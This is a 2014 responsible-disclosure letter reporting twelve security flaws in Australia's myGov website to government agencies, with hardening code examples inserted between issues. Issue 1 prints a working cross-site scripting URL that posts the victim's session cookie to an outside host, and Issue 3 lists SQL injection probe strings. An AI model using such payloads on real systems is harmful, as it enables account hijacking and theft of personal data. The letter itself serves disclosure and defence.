
Nik Cubrilovic

nikcub@gmail.com
+61 435 177 210

Friday 2nd of May 2014

To: Information Security Contact
Department of Human Services

Cc: Department of Finance
Office of the Australian Information Commissioner

Re: URGENT Security issues on myGov website

My name is Nik Cubrilovic and I am an independent security consultant and penetration tester. I am writing to you to report numerous security issues with the myGov website. The most serious of these security vulnerabilities would allow an attacker to hijack the account of any registered myGov user.

I found these issues after conducting a very basic security test of the website after reading the story by Ben Grubb about myGov in the Sydney Morning Herald on Monday:

"Australians' private government details at the mercy of hackers, say IT security experts", published on the 28th of April 2014:

http://www.smh.com.au/it-pro/government-it/australians-private-government-details-at-mercy-of-hackers-say-it-security-experts-20140428-zqzkg.html

Please see that the details of this report are routed to the right people who would be able to bring urgent attention to getting these issues fixed. I was unable to find a security contact on the myGov or department website.

Please find the details of each issue below; feel free to contact me on the email or phone number listed above.

Note that I have only tested the public interfaces of the myGov website, and have not carried out an exhaustive penetration test of the service. The issues found with only the public interface lead me to conclude that there are likely more similar issues with the service.

The most serious of these issues allows an attacker to hijack the account of any myGov user. I have successfully carried out this attack against my own myGov account using two computers.

Issue 1: Cross-Site Scripting Vulnerabilities in Enrollment Service

The URL at https://my.gov.au/EnrolService/enrolService.htm contains two cross-site scripting vulnerabilities. The URL query parameters _flowExecutionKey and _flowId both do not filter their values and pass them into the output unaltered and unsanitised. This means that an attacker can inject Javascript into the parameter and have it executed within the context of a user's myGov session. This can lead to capturing keystrokes or data, or hijacking a user's session by capturing their cookie.

Here is an example exploit URL (WARNING: This is a live attack):

https://my.gov.au/EnrolService/enrolService.htm?_flowId=enrolmentmgflow&_flowExecutionKey=e2s13f652%3cimg%20src%3da%20onerror%3d%22$.post('http://s03.do.nikcub.com/get.php',document.cookie)%22%3e24aae26396

This vulnerability can be executed in the background of another page, or in an IFRAME. This exploit can work on all browsers and across all platforms.

Here is a screenshot of my browser executing my own Javascript on the myGov website:

Recommendation: User input should be filtered and preferably whitelisted. Any output that is meant to be rendered on an HTML page should be escaped (HTML-encoded character references). Examples:

Character    Escaped Output
"            &quot;
<            &lt;
>            &gt;
&            &amp;

Issue 2: Server Crash on malformed input

The server can be made to reliably crash with malformed input. There are numerous URLs and numerous parameters where input outside of the expected bounds (eg. A-Z, a-z, 0-9) causes the server to crash with a 500 error.

A server crashing on unexpected input is indicative of improper input handling, which often leads to SQL injection and cross-site scripting attacks (as seen in Issue 1).

The number of pages and parameters that crash on improper input is too long to list here, but some examples are:

URL                        Parameter          Value      Result
/LoginServices/main/login  execution (GET)               500
/LoginServices/main/login  ajaxSource         <>%)(&+    500
/LoginServices/main/login  _eventId_SignIn    <>%)(&+    500
/LoginServices/main/login  fragments          <>%)(&+    500
/LoginServices/main/login  _flowExecutionKey  <>%)(&+    500
/LoginServices/main/login  credentialType     <>%)(&+    500
/LoginServices/main/login  userId             <>%)(&+    500
/LoginServices/main/login  password           <>%)(&+    500
/LoginServices/main/login  execution (GET)    /          500

Recommendation: User input should be thoroughly filtered, sanitised and then validated. Improper input handling is the cause of the most common security issues with web applications, and often leads to bugs that are both easy to discover and easy to exploit.

Issue 3: SQL Injection Attack

In the URL /LoginServices/Authenticate.do the parameter name is vulnerable to SQL Injection. SQL Injection is where input from the user is not adequately filtered and is allowed to alter queries being executed on the database.

In the /LoginServices/Authenticate.do URL any parameter name is injectable. This is identified by looking at the different responses to two SQL queries: one which returns true and another which returns false. Examples:

URL                                  Response Type           Length
/Authenticate.do?(select%201)=1      Error 400: Bad Request  355 bytes
/Authenticate.do?(select%201%2c2)=1  200 OK                  4253 bytes

There are other URLs that also give out either server errors or varying responses to different true/false SQL combinations, which is indicative of an SQL injection.

Recommendation: As with the above examples, this is a result of inadequate input filtering. All user input should be filtered, sanitised and then validated.
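Because the letter reports that the parameter name, not only its value, reaches the query, filtering alone is not enough: identifiers cannot be bound as query parameters, so the name must be checked against a fixed allow-list while the value is bound. The following added example (not the letter's or the myGov application's code) shows the defective pattern beside the hardened one against an in-memory SQLite table with constructed rows; the table and column names are assumptions made here.

```python
"""SQL built from request data vs. an allow-list plus bound parameters (added example)."""
import sqlite3

# Assumed set of columns a caller may filter on; anything else is refused.
ALLOWED_COLUMNS = {"username", "credential_type"}


def make_db():
    """Constructed in-memory table for the demonstration only."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, credential_type TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "password"), ("bob", "password"), ("carol", "token")],
    )
    return db


def lookup_unsafe(db, field, value):
    """Defective pattern: the parameter NAME and VALUE are both spliced into
    SQL text, so either can change the meaning of the WHERE clause."""
    sql = f"SELECT username FROM users WHERE {field} = '{value}'"
    return sorted(row[0] for row in db.execute(sql))


def lookup_safe(db, field, value):
    """Hardened pattern: the column must be in the allow-list (identifiers
    cannot be bound), and the value travels as a bound parameter, so the
    database never parses it as SQL."""
    if field not in ALLOWED_COLUMNS:
        raise ValueError(f"unknown field {field!r}")
    sql = f"SELECT username FROM users WHERE {field} = ?"
    return sorted(row[0] for row in db.execute(sql, (value,)))


def demo():
    """Run both lookups with a constructed true/false style input of the kind
    the letter describes and return the rows each version yields."""
    db = make_db()
    crafted = "x' OR '1'='1"
    return {
        "unsafe": lookup_unsafe(db, "username", crafted),  # every row matches
        "safe": lookup_safe(db, "username", crafted),      # no row matches
    }
```

The behavioural difference is the detection signal the letter relies on: in the unsafe version a true condition returns every row and a false one returns none, whereas the hardened version returns the same empty result for any string that is not an actual username.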
Issue 4: Sessions are incorrectly expired

The myGov website sets numerous cookies in the user's browser for session management. The primary cookie used to authenticate the user is set as a session-based cookie, which means the cookie remains valid as long as the user has not restarted their browser.

Instead of using the cookie standard to expire the session, the myGov application runs a Javascript function that checks the user's inactivity time and then expires the cookie using Javascript. This is not the correct way to implement short-lived user sessions, nor is it the industry-accepted method for implementing short-lived sessions with a set expiry time (in this case 15 minutes).

The reason why this method of session expiration is unsafe is because an attacker using a technique such as the cross-site scripting vulnerability described in Issue 1 is able to alter the Javascript and prevent the execution of the expiry routine.

Javascript also has no reliable method of expiring cookies, and there are many ways in which the expiration can be blocked or prevented from running (ad-blocking software, the Javascript source not being loaded completely and thus not executing, etc.)

Recommendation: Implement the session by setting a proper expiry date on the cookie which is 15 minutes in the future. The cookie will then be expired using the standard mechanism built into the browser, rather than a custom technique implemented in Javascript.

Issue 5: No Secure flag set on cookies

The cookies that are set on the myGov website do not set the Secure flag. This means that with an SSL stripping attack (where an attacker sits in between the user and the web application) the cookies would be sent in the clear, allowing the attacker to hijack the user's session.

The most common application of such a vulnerability would be with users connected via public wifi, where an attacker on the same network could masquerade as the router, intercept all traffic and act as a proxy intercepting sensitive data.

Recommendation: Set the Secure flag on cookies.

Issue 6: No strict transport security set

Related to the secure cookies issue, the myGov website does not force the browser to use an SSL connection using the HTTP Strict Transport Security standard. This allows an attacker acting in a proxy capacity (a man-in-the-middle attack) to strip SSL.

Modern browsers support the HTTP Strict Transport Security standard, whereupon after a first connection the browser will refuse to connect to a website unless it is both over SSL and to the server with the same certificate signature.

Recommendation: Set the Strict-Transport-Security header in all web server responses. For further details see the RFC for the HSTS standard, number 6797, at http://tools.ietf.org/html/rfc6797

Issue 7: Cookies do not set the HttpOnly flag and can be read in Javascript

The cookies set by the myGov website do not set the HttpOnly flag, which means an exploit such as that described in Issue 1 is able to read the cookie and hijack the user's session.

Recommendation: Set the HttpOnly flag on each cookie. Cookies on a secure web application should not be able to be read by Javascript.
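Issues 4, 5 and 7 are all attributes of the same Set-Cookie header. The following added example (not the letter's or the myGov application's code) builds a session cookie with the 15 minute expiry the letter recommends plus the Secure and HttpOnly flags, and audits an arbitrary Set-Cookie value for the three findings. The cookie name and sample timestamp are constructed for illustration.

```python
"""Session cookie attributes: fixed expiry, Secure and HttpOnly (added example)."""
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime

SESSION_TTL = timedelta(minutes=15)   # lifetime named in Issue 4


def build_session_cookie(name, value, now, ttl=SESSION_TTL):
    """Return a Set-Cookie header value with an explicit expiry and both flags.

    Max-Age is what current browsers honour; Expires is kept for older ones.
    Neither replaces server-side expiry: the server must still reject the
    session id after `ttl`, because the browser's clock is not trusted.
    """
    expires = format_datetime((now + ttl).astimezone(timezone.utc), usegmt=True)
    attrs = [
        f"{name}={value}",
        f"Max-Age={int(ttl.total_seconds())}",
        f"Expires={expires}",
        "Path=/",
        "Secure",       # never sent over plain HTTP (Issue 5)
        "HttpOnly",     # not readable via document.cookie (Issue 7)
        "SameSite=Lax",
    ]
    return "; ".join(attrs)


def audit_set_cookie(header):
    """Check one Set-Cookie header value and return a list of findings."""
    parts = [p.strip() for p in header.split(";")]
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    findings = []
    if "max-age" not in attrs and "expires" not in attrs:
        findings.append("session-only cookie: no Max-Age or Expires (Issue 4)")
    if "secure" not in attrs:
        findings.append("missing Secure flag (Issue 5)")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly flag (Issue 7)")
    return findings


def example_header():
    """Build the cookie at a constructed instant (the date of this letter)."""
    now = datetime(2014, 5, 2, 12, 0, tzinfo=timezone.utc)
    return build_session_cookie("SESSIONID", "constructed-session-id", now)
```

The audit function parses the header exactly as a browser would see it, so it can be run over a captured response to confirm the fix rather than trusting the application's configuration.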
Issue 8: Password authentication is susceptible to brute-force attacks

The login method on myGov does not contain a CAPTCHA, used to distinguish between human authentication attempts and attempts from a bot. The login method also does not throttle requests from a user. The combination of these two issues means that a program can be written to brute-force attack user passwords.

Recommendation: Implement a CAPTCHA. Implement throttling on user authentication via an application-level firewall, or implement a side channel for authentication (see Issue 10).

Issue 9: No brute-force or robot protection on account linking

When a myGov user links an account, it requires information such as a user's first name, surname, address and date of birth. The server responses indicate to the user which field is not matched and if the link details (such as a Medicare number) are valid.

An attacker is able to brute-force these details using a bot as there is no human check (CAPTCHA) or throttling of requests.

Recommendation: As per password authentication, implement a CAPTCHA and application-level request throttling on account linking.
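The throttling recommended for Issues 8 and 9 is the same control keyed on two things: the account being targeted and the source making the requests. The following added example (not the letter's or the myGov application's code) implements a sliding-window failure counter and wraps a credential check with it; the thresholds, window length and the constructed credential store are assumptions chosen here. The same wrapper can front the account-linking check, with the link details in place of the password.

```python
"""Per-account and per-source failure throttling for login and linking (added example)."""
import hmac
from collections import defaultdict, deque


class FailureThrottle:
    """Sliding-window counter: once `limit` failures are recorded for a key
    within `window` seconds, further attempts for that key are refused until
    the oldest failure ages out."""

    def __init__(self, limit, window):
        self.limit = limit
        self.window = window
        self._failures = defaultdict(deque)

    def _prune(self, key, now):
        q = self._failures[key]
        while q and now - q[0] >= self.window:
            q.popleft()
        return q

    def is_blocked(self, key, now):
        return len(self._prune(key, now)) >= self.limit

    def record_failure(self, key, now):
        self._prune(key, now).append(now)

    def reset(self, key):
        self._failures.pop(key, None)


class Authenticator:
    """Wraps a credential check with throttling keyed by account and by source."""

    def __init__(self, check, account_limit=5, source_limit=50, window=900):
        self.check = check
        self.by_account = FailureThrottle(account_limit, window)
        self.by_source = FailureThrottle(source_limit, window)

    def attempt(self, account, secret, source, now):
        # Refuse before consulting the credential store, so a throttled caller
        # learns nothing about the account or the secret.
        if self.by_account.is_blocked(account, now) or self.by_source.is_blocked(source, now):
            return "throttled"
        if self.check(account, secret):
            self.by_account.reset(account)
            return "ok"
        self.by_account.record_failure(account, now)
        self.by_source.record_failure(source, now)
        return "failed"


# Constructed credential store for the demonstration only. A real store
# would hold password hashes and compare against the hash of the input.
_DEMO_SECRETS = {"user-1": "correct horse battery staple"}


def demo_check(account, secret):
    stored = _DEMO_SECRETS.get(account)
    return stored is not None and hmac.compare_digest(stored, secret)


def run_demo():
    """Five wrong guesses, then the sixth and a correct attempt are throttled,
    and the correct attempt succeeds once the window has passed."""
    auth = Authenticator(demo_check, account_limit=5, window=900)
    src = "203.0.113.9"   # constructed source address
    results = [auth.attempt("user-1", f"guess-{i}", src, now=i) for i in range(6)]
    results.append(auth.attempt("user-1", "correct horse battery staple", src, now=7))
    results.append(auth.attempt("user-1", "correct horse battery staple", src, now=1000))
    return results
```

A single uniform "failed" result is returned for wrong account and wrong secret alike; the field-by-field feedback the letter describes for account linking would defeat the throttle by telling the caller which fields are already right.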
Issue 10: No side-channel authentication of user accounts

Related to the previous issue is the lack of a side-channel method of user authentication. The authentication tokens used on registration of myGov accounts are a user's name, surname, date of birth and, for example, a Medicare number. None of these parameters are secrets.

This leaves authentication susceptible to authentication attacks where an attacker could extract these authentication secrets using methods such as social engineering or spear phishing.

Recommendation: Implement a side channel for user authentication. An example would be sending a unique code to a verified mobile phone number, or to a verified mailing address for the user. This unique token would serve as proof of identity in the authentication and authorisation routine.
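The unique code in the recommendation above is only a proof of identity if it is unguessable, short-lived, single-use and limited in guesses. The following added example (not the letter's or the myGov application's code) issues such a code for delivery over the verified phone or postal channel, stores only a salted hash of it, and verifies it under those rules. The code length, lifetime and attempt limit are assumptions chosen here.

```python
"""One-time code delivered over a side channel, with expiry and attempt limit (added example)."""
import hashlib
import hmac
import secrets

CODE_DIGITS = 6
CODE_TTL = 600      # seconds the code stays valid (assumed)
MAX_ATTEMPTS = 3    # wrong guesses before the code is discarded (assumed)


class OneTimeCodes:
    def __init__(self):
        self._pending = {}   # user id -> (salt, digest, expires_at, attempts_left)

    @staticmethod
    def _digest(salt, code):
        return hashlib.sha256(salt + code.encode()).digest()

    def issue(self, user_id, now):
        """Generate a code and return it for delivery over the side channel.

        Only a salted hash is kept, so a read of the pending table does not
        reveal live codes. Issuing a new code replaces any earlier one.
        """
        code = f"{secrets.randbelow(10 ** CODE_DIGITS):0{CODE_DIGITS}d}"
        salt = secrets.token_bytes(16)
        self._pending[user_id] = (salt, self._digest(salt, code), now + CODE_TTL, MAX_ATTEMPTS)
        return code

    def verify(self, user_id, code, now):
        """Return one of: ok, wrong, locked, expired, no_code."""
        entry = self._pending.get(user_id)
        if entry is None:
            return "no_code"
        salt, digest, expires_at, attempts_left = entry
        if now >= expires_at:
            del self._pending[user_id]
            return "expired"
        # Constant-time comparison of the hashes, not of the raw code.
        if hmac.compare_digest(digest, self._digest(salt, code)):
            del self._pending[user_id]          # single use
            return "ok"
        attempts_left -= 1
        if attempts_left <= 0:
            del self._pending[user_id]
            return "locked"
        self._pending[user_id] = (salt, digest, expires_at, attempts_left)
        return "wrong"


def wrong_code_for(code):
    """Return a code that differs from `code` (used in the demonstration)."""
    return "000000" if code != "000000" else "000001"
```

The attempt limit matters as much as the length: a six-digit code with unlimited guesses is weaker than the Medicare number it replaces, while three guesses in ten minutes leaves the guess-to-success ratio at roughly one in a third of a million per issued code.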
Issue 11: Frameable response (clickjacking)

A web page controlled by an attacker is able to load the content of the myGov web application within an iframe on another page. This enables a "clickjacking" attack, in which the attacker's page overlays the target application's interface with a different interface provided by the attacker and captures the user's clicks or login information.

A frameable web application also means that as part of a cross-site scripting attack (see Issue 1) the attacker does not have to send the victim a direct URL to myGov, but may instead load the exploit URL in the background of another page (such as a forum, website or on an ad network).

Recommendation: The server should set a suitable X-Frame-Options header (eg. SAMEORIGIN, which would prevent the page being framed on another site).

The X-Frame-Options header is described in RFC 7034 and is supported by all major browsers. The RFC can be found at http://tools.ietf.org/html/rfc7034
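The headers recommended for Issues 6 and 11 are both checkable from a single captured response. The following added example (not the letter's or the myGov application's code) audits a dictionary of response headers for a usable Strict-Transport-Security value and for framing protection; it also accepts the Content-Security-Policy frame-ancestors directive, which postdates the letter but serves the same purpose as X-Frame-Options. The one-year minimum max-age is a common recommendation, not a requirement of RFC 6797, and the sample header sets are constructed.

```python
"""Audit response headers for HSTS (Issue 6) and framing protection (Issue 11) (added example)."""

MIN_HSTS_MAX_AGE = 31536000   # one year; a common recommendation, assumed here


def parse_hsts(value):
    """Return (max_age, include_subdomains) from a Strict-Transport-Security value."""
    max_age = None
    include_sub = False
    for directive in value.split(";"):
        d = directive.strip()
        if d.lower().startswith("max-age="):
            try:
                max_age = int(d.split("=", 1)[1].strip().strip('"'))
            except ValueError:
                max_age = None
        elif d.lower() == "includesubdomains":
            include_sub = True
    return max_age, include_sub


def audit_headers(headers):
    """Check a dict of response headers (names case-insensitive) and return findings."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []

    hsts = h.get("strict-transport-security")
    if hsts is None:
        findings.append("no Strict-Transport-Security header (Issue 6)")
    else:
        max_age, include_sub = parse_hsts(hsts)
        if max_age is None:
            findings.append("HSTS header has no valid max-age")
        elif max_age < MIN_HSTS_MAX_AGE:
            findings.append(f"HSTS max-age {max_age} is below {MIN_HSTS_MAX_AGE}")
        if not include_sub:
            findings.append("HSTS does not cover subdomains (includeSubDomains)")

    xfo = h.get("x-frame-options", "").strip().upper()
    csp = h.get("content-security-policy", "")
    has_frame_ancestors = "frame-ancestors" in csp.lower()
    if xfo not in ("DENY", "SAMEORIGIN") and not has_frame_ancestors:
        findings.append(
            "response is frameable: no X-Frame-Options DENY/SAMEORIGIN "
            "or CSP frame-ancestors (Issue 11)"
        )
    return findings


# Header values that satisfy the audit (constructed for illustration).
RECOMMENDED = {
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "X-Frame-Options": "SAMEORIGIN",
}
```

Note that HSTS only takes effect after the browser has seen the header once over a valid HTTPS connection, so it must be sent on every HTTPS response, not only on the login page.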
Issue 12: No security point of contact

Upon discovery of these issues I attempted to track down a security point of contact. The myGov website does not publish a contact address, PGP key (for secure communication) or details of a disclosure policy.

Recommendation: Add a detailed section to the security page of the myGov website where users and security researchers can report security issues. Include a contact email address, phone number, PGP key and details of the disclosure policy for the website.

Responsible Disclosure

It is my intention to make these issues public at some point in the future. As myGov has no published responsible disclosure policy, we can apply the industry standard 7-day disclosure timeline.

See Google's disclosure policy as an example:

http://googleonlinesecurity.blogspot.com.au/2013/05/disclosure-timeline-for-vulnerabilities.html

I would consider the cross-site scripting vulnerability to be a critical issue that requires urgent attention.

If the department requires longer than 7 days to fix this issue, please let me know. I would also ask that the department confirm receipt of these issues and any response as soon as possible.

My primary concern is the security of users of the myGov service. I think there is a high probability that the cross-site scripting vulnerability, or some combination of the other issues, have been exploited in the wild.

Good security practice and policy thrives in an environment of transparency and disclosure, hence my intention to detail the issues found on the myGov website on my blog once they have been fixed.
